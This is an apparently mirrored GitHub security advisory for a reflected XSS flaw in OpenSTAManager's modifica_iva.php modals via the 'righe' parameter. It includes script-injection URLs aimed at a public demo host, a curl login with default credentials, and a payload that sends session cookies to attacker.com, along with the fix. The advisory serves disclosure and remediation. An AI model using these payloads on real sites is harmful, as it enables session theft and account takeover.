GHSA-JFGP-G7X7-J25J

Vulnerability from github – Published: 2026-03-03 17:39 – Updated: 2026-03-04 01:59
VLAI?
Summary
OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter
Details

Summary

Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.

Vulnerable Parameter: righe (GET)

Details

OpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the righe GET parameter before reflecting it in HTML output.

Vulnerable Code Location: File: /modules/contratti/modals/modifica_iva.php (Line 125)

<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

The $_GET['righe'] parameter is directly echoed into the HTML value attribute without any sanitization using htmlspecialchars() or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.

All Affected Files:

  1. /modules/contratti/modals/modifica_iva.php - Line 125, Line 167
  2. /modules/preventivi/modals/modifica_iva.php - Line 125, Line 167
  3. /modules/fatture/modals/modifica_iva.php - Line 121, Line 161
  4. /modules/ddt/modals/modifica_iva.php - Line 125, Line 167
  5. /modules/ordini/modals/modifica_iva.php - Line 125, Line 167
  6. /modules/interventi/modals/modifica_iva.php - Line 125, Line 167

PoC

Prerequisites: - Running instance of OpenSTAManager v2.9.8 - Valid admin credentials (username: admin, password: admin for test instance)

Step 1: Login

curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Trigger XSS Navigate to the following URL in a browser (or use curl with cookies):

http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

Tested URLs (All vulnerable): - https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script> - https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script> - https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script> - https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script> - https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script> - https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

Expected Result: JavaScript alert popup displays showing the current session cookie, confirming code execution.

HTML Output (verified on live instance):

<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

Verification:

image

image

Alternative Payloads: Session stealing: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>

Impact

Affected Users: All authenticated users with access to contracts, invoices, quotes, or orders modules.

Attack Scenario: 1. Attacker crafts malicious URL with XSS payload 2. Attacker sends URL to victim via email/chat/phishing 3. Victim (authenticated user) clicks the link 4. Malicious JavaScript executes in victim's browser context 5. Attacker can: - Steal session cookies → Full account takeover - Perform actions on behalf of victim (create/modify/delete records) - Steal CSRF tokens and bypass CSRF protection - Redirect to phishing page - Inject keylogger to capture sensitive data - Modify page content to trick user into revealing credentials

Recommended Fix:

<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

Apply this fix to all affected files listed in Details section.

Severity ?
5.1 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "devcode-it/openstamanager"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.9.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24415"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T17:39:00Z",
    "nvd_published_at": "2026-03-03T22:16:28Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nMultiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users\u0027 browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.\n\n**Vulnerable Parameter:** `righe` (GET)\n\n### Details\n\nOpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the `righe` GET parameter before reflecting it in HTML output.\n\n**Vulnerable Code Location:**\nFile: `/modules/contratti/modals/modifica_iva.php` (Line 125)\n\n```php\n\u003cinput type=\"hidden\" name=\"righe\" value=\"\u003c?php echo $_GET[\u0027righe\u0027]; ?\u003e\"\u003e\n```\n\nThe `$_GET[\u0027righe\u0027]` parameter is directly echoed into the HTML `value` attribute without any sanitization using `htmlspecialchars()` or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.\n\n**All Affected Files:**\n\n1. `/modules/contratti/modals/modifica_iva.php` - **Line 125, Line 167**\n2. `/modules/preventivi/modals/modifica_iva.php` - **Line 125, Line 167**\n3. `/modules/fatture/modals/modifica_iva.php` - **Line 121, Line 161**\n4. `/modules/ddt/modals/modifica_iva.php` - **Line 125, Line 167**\n5. `/modules/ordini/modals/modifica_iva.php` - **Line 125, Line 167**\n6. `/modules/interventi/modals/modifica_iva.php` - **Line 125, Line 167**\n\n### PoC\n\n**Prerequisites:**\n- Running instance of OpenSTAManager v2.9.8\n- Valid admin credentials (username: admin, password: admin for test instance)\n\n**Step 1: Login**\n```bash\ncurl -c cookies.txt -X POST \u0027http://localhost:8081/index.php?op=login\u0027 \\\n  -d \u0027username=admin\u0026password=admin\u0027\n```\n\n**Step 2: Trigger XSS**\nNavigate to the following URL in a browser (or use curl with cookies):\n```\nhttp://localhost:8081/modules/contratti/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.domain)\u003c/script\u003e\n```\n\n**Tested URLs (All vulnerable):**\n- `https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n- `https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe=\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e`\n\n**Expected Result:**\nJavaScript alert popup displays showing the current session cookie, confirming code execution.\n\n**HTML Output (verified on live instance):**\n```html\n\u003cinput type=\"hidden\" name=\"righe\" value=\"\"\u003e\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\"\u003e\n```\n\n**Verification:**\n\n\u003cimg width=\"1260\" height=\"99\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4e91a461-bae6-40fb-b7c3-b8bd1eb48473\" /\u003e\n\n\u003cimg width=\"2060\" height=\"1180\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6dbde967-0505-43d1-b455-adc91a4808c0\" /\u003e\n\n**Alternative Payloads:**\nSession stealing: `\"\u003e\u003cscript\u003efetch(\u0027https://attacker.com/?c=\u0027+document.cookie)\u003c/script\u003e`\n\n### Impact\n\n\n**Affected Users:** All authenticated users with access to contracts, invoices, quotes, or orders modules.\n\n**Attack Scenario:**\n1. Attacker crafts malicious URL with XSS payload\n2. Attacker sends URL to victim via email/chat/phishing\n3. Victim (authenticated user) clicks the link\n4. Malicious JavaScript executes in victim\u0027s browser context\n5. Attacker can:\n   - Steal session cookies \u2192 Full account takeover\n   - Perform actions on behalf of victim (create/modify/delete records)\n   - Steal CSRF tokens and bypass CSRF protection\n   - Redirect to phishing page\n   - Inject keylogger to capture sensitive data\n   - Modify page content to trick user into revealing credentials\n\n\n**Recommended Fix:**\n```php\n\u003cinput type=\"hidden\" name=\"righe\" value=\"\u003c?php echo htmlspecialchars($_GET[\u0027righe\u0027], ENT_QUOTES, \u0027UTF-8\u0027); ?\u003e\"\u003e\n```\n\nApply this fix to all affected files listed in Details section.",
  "id": "GHSA-jfgp-g7x7-j25j",
  "modified": "2026-03-04T01:59:55Z",
  "published": "2026-03-03T17:39:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-jfgp-g7x7-j25j"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24415"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/devcode-it/openstamanager"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenSTAManager Affected by XSS in modifica_iva.php via righe parameter"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.